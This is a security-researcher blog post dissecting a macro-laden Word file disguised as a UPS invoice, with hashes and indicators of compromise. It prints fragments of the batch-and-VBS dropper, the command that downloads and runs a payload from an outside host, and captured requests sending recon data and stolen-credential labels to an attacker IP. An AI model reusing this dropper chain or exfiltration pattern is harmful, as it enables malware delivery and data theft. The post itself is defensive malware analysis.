Quick Analyzis of a(nother) Maldoc
Yesterday, one of our readers (thank David!) submitted to us a malicious document disguised as a UPS invoice. Like David, do not hesitate to share samples with us, we like malware samples! I briefly checked the document. Nothing new, based on a classic macro, it was easy to analyze and I can give you an overview of the infection process and what kind of data can be exfiltrated.
The malicious document was called 'ups_invoice_0701932_262.doc' (SHA256:be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af) and has a current VT score of 10/61[1]. It contained some macros that, once the document opened, perform the malicious activity:
# oledump.py ups_invoice_0701932_262_doc A: word/vbaProject.bin A1: 734 'PROJECT' A2: 30 'PROJECTlk' A3: 233 'PROJECTwm' A4: 97 'UserForm1/\x01CompObj' A5: 294 'UserForm1/\x03VBFrame' A6: 883 'UserForm1/f' A7: 6688 'UserForm1/o' A8: M 1453 'VBA/Module1' A9: M 21943 'VBA/Module2' A10: M 2239 'VBA/Module3' A11: M 2331 'VBA/Module4' A12: M 252836 'VBA/NewMacros' A13: m 938 'VBA/ThisDocument' A14: m 1493 'VBA/UserForm1' A15: 8300 'VBA/_VBA_PROJECT' A16: 1302 'VBA/dir' A17: M 412655 'VBA/wLoadImages'
The infection path is the following: Word > Macro > Batch File (.cmd) >VBScript > Windows PE
The macro dumps a batch file on the disk (SHA256:96d785cdc95bff2f081f57d2c9fdee3b76daf1c3295d2b9e6298678ed32953b9). The dropped file is '%APPDATA%\..EnableDelayedExpansion\Documents1.CMD' Most of the commands are simpe “echo” that are used to create a VBS script '%APPDATA%\..EnableDelayedExpansion\gditbits.vbs'.
Sample of code with garbage words to make it more difficult to read:
@echo off echo "93319427177886784668351442764871949889113678316627428857276359" set mtspf=%APPDATA%\..EnableDelayedExpansion\gdibits.vbs echo 'To determine H. pylori resistance to clarithromycin >> %mtspf% echo 'were designed against the 23S rRNA gene >> %mtspf% echo Dim hResBit, MpicOffer, xmpage, MenuPrice, ListPrice, Fundament, BufferBat >> %mtspf% echo On Error Resume Next >> %mtspf% echo. >> %mtspf% echo Set hResBit = Wscript.Arguments >> %mtspf% echo 'To determine H. pylori resistance to clarithromycin >> %mtspf% echo 'were designed against the 23S rRNA gene >> %mtspf% echo "471495911668846928514952834168735538343318577458669595" echo "137756746277365597113689825816848246219143776556384827" echo "589196889244714223435471453592227671689523411938182673" echo "714793381962982623587978735968646573151481843754943393" echo Set MpicOffer = CreateObject("MSXML2.ServerXMLHTTP.6.0") >> %mtspf% echo "72797134559562738358938549883642286878881617597196952189815336" echo ListPrice = hResBit(0) >> %mtspf% echo Fundament = hResBit(1) >> %mtspf% echo 'The most common question that restaurants are asking us revolve >> %mtspf% echo 'special accommodations) that may be requested >> %mtspf% echo. >> %mtspf% echo MpicOffer.Open "GET", ListPrice, False >> %mtspf%
Then the VBS script is launched with two arguments (see above the Wscript.Arguments):
cscript //nologo %APPDATA%\..EnableDelayedExpansion\gdibits.vbs hxxps://greatingusa[.]com/red1.res %APPDATA%\..EnableDelayedExpansion\hddput8.exe
Finally, hddput8.exe is launched:
start %APPDATA%\..EnableDelayedExpansion\hddput8.exe"
The PE file (SHA256:cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158) has a VT score of 44/72[2]
Here are same POST HTTP requests with exfiltrated data performed by the malware:
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/90 HTTP/1.1 Content-Type: multipart/form-data; boundary=aksgja8s8d8a8s97 User-Agent: KSKJJGJ Host: 203.176.135.102:8082 Content-Length: 4419 Cache-Control: no-cache --aksgja8s8d8a8s97 Content-Disposition: form-data; name="proclist" ***TASK LIST*** [System Process] System smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe taskhost.exe dwm.exe svchost.exe svchost.exe svchost.exe notepad.exe calc.exe svchost.exe notepad.exe explorer.exe iexplore.exe WmiPrvSE.exe rundll32.exe svchost.exe --aksgja8s8d8a8s97 Content-Disposition: form-data; name="sysinfo" ***S Y S T E M I N F O*** HostName: 3OwiR2Q OSName: Microsoft Windows 7 Professional OSVersion: Service Pack 1 OSArchitecture: 64-bit ProductType: Workstation BuildType: Multiprocessor Free RegisteredOwner: Zahwl3xniYy RegisteredOrg: CVDh5l614 SerialNumber: 00371-222-2524677-68218 InstallDate: 30/12/1899 00.00.00 LastBootUpTime: 30/12/1899 00.00.00 WindowsDirectory: C:\Windows SystemDirectory: C:\Windows\system32 BootDevice: \Device\HarddiskVolume1 TotalPhysicalMemory: 3127 Mb AvailablePhysicalMemory: 3127 Mb /c ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : <redacted> Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC Physical Address. . . . . . . . . : <redacted> DHCP Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes Link-local IPv6 Address . . . . . : <Redacted>(Preferred) IPv4 Address. . . . . . . . . . . : 192.168.100.6(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Lease Obtained. . . . . . . . . . : Thursday, January 09, 2019 6:19:19 AM Lease Expires . . . . . . . . . . : Thursday, January 16, 2156 1:08:23 AM Default Gateway . . . . . . . . . : 192.168.100.1 DHCP Server . . . . . . . . . . . : 192.168.100.1 DHCPv6 IAID . . . . . . . . . . . : 240276480 DHCPv6 Client DUID. . . . . . . . : <Redacted> DNS Servers . . . . . . . . . . . : 8.8.8.8 NetBIOS over Tcpip. . . . . . . . : Disabled /c net config workstation Computer name \\<Redacted> Full Computer name <Redacted> User name Administrator Workstation active on Software version Windows 7 Professional Workstation domain WORKGROUP Workstation Domain DNS Name <Redacted>.com Logon domain TESTER COM Open Timeout (sec) 0 COM Send Count (byte) 16 COM Send Timeout (msec) 250 The command completed successfully. /c net view /all There are no entries in the list. /c net view /all /domain There are no entries in the list. /c nltest /domain_trusts Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF /c nltest /domain_trusts /all_trusts Enumerating domain trusts failed: Status = 1717 0x6b5 RPC_S_UNKNOWN_IF --aksgja8s8d8a8s97-- HTTP/1.1 200 OK server: Cowboy date: Thu, 09 Jan 2020 09:41:52 GMT content-length: 3 Content-Type: text/plain /1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 203.176.135.102 Connection: close Content-Type: multipart/form-data; boundary=---------PAOUUIBNQKZQDUJR Content-Length: 210 -----------PAOUUIBNQKZQDUJR Content-Disposition: form-data; name="data" -----------PAOUUIBNQKZQDUJR Content-Disposition: form-data; name="source" OpenSSH private keys -----------PAOUUIBNQKZQDUJR-- HTTP/1.1 200 OK connection: close server: Cowboy date: Thu, 09 Jan 2020 09:42:07 GMT content-length: 3 Content-Type: text/plain /1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/83/ HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 203.176.135.102 Connection: close Content-Type: multipart/form-data; boundary=---------QPKAEZSIUTKMSAWM Content-Length: 299 -----------QPKAEZSIUTKMSAWM Content-Disposition: form-data; name="formdata" {]} -----------QPKAEZSIUTKMSAWM Content-Disposition: form-data; name="billinfo" {]} -----------QPKAEZSIUTKMSAWM Content-Disposition: form-data; name="cardinfo" {SQL logic error -----------QPKAEZSIUTKMSAWM-- HTTP/1.1 200 OK connection: close server: Cowboy date: Thu, 09 Jan 2020 09:41:16 GMT content-length: 3 Content-Type: text/plain /1/
POST /red1/3OwiR2Q_W617601.7E915F4B9C0EEC907F5644D2061DB08F/81/ HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 203.176.135.102 Connection: close Content-Type: multipart/form-data; boundary=---------ITSDTHZDVZQGMVVI Content-Length: 219 -----------ITSDTHZDVZQGMVVI Content-Disposition: form-data; name="data" -----------ITSDTHZDVZQGMVVI Content-Disposition: form-data; name="source" OpenVPN passwords and configs -----------ITSDTHZDVZQGMVVI-- HTTP/1.1 200 OK connection: close server: Cowboy date: Thu, 09 Jan 2020 09:41:41 GMT content-length: 3 Content-Type: text/plain /1/
Note that, at the time I'm writing this diary, the domain 'greatingusa[.]com' is still active.
[1] https://www.virustotal.com/gui/file/be0939cbb5ba129ef316149adc474b00ad9f526513a6f6f6f6adc802290c02af/detection
[2] https://www.virustotal.com/gui/file/cfd98c1ee7ab19a63b31bcb6be133e6b61ce723f94a8f91741983bf79b4d1158/detection
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024 |
Comments
I get interesting samples from time to time, but how do we submit them?
I can see how to submit firewall logs (just don't have access to any that I'm allowed to share, i.e. where security trips over security, sigh) but not how to best submit malware samples. Sounds like that would be a topic for a post, including any pre-processing we submitters could do to help the process along such as current scores on other (linked) testing tools.
Anonymous
Jan 9th 2020
4 years ago
Anonymous
Jan 9th 2020
4 years ago